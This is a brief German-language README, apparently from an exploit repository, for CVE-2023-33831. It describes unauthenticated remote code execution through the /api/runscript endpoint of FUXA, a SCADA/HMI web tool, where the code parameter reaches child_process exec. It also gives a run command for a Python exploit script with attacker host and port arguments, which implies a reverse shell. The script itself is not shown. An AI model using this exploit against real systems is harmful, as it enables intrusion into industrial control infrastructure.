
Beschreibung und Exploit von CVE-2023-33831, der die webbasierte Prozessvisualisierungssoftware FUXA (SCADA/HMI/Dashboard) betrifft.
Die Sicherheitslücke betrifft die Scripting-Komponente von FUXA, da Eingaben, die von Benutzern kontrolliert werden können, nicht ausreichend kontrolliert oder bereinigt werden, wodurch die Verwendung gefährlicher Methoden ermöglicht wird, die für die Remote-Code-Ausführung ausgenutzt werden können. Die betroffene Route ist /api/runscript, wo es möglich ist, Befehle auszuführen, ohne sich authentifizieren zu müssen, über den code-Parameter mittels der POST-Methode unter Verwendung des child_process-Moduls über die exec-Funktion.
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>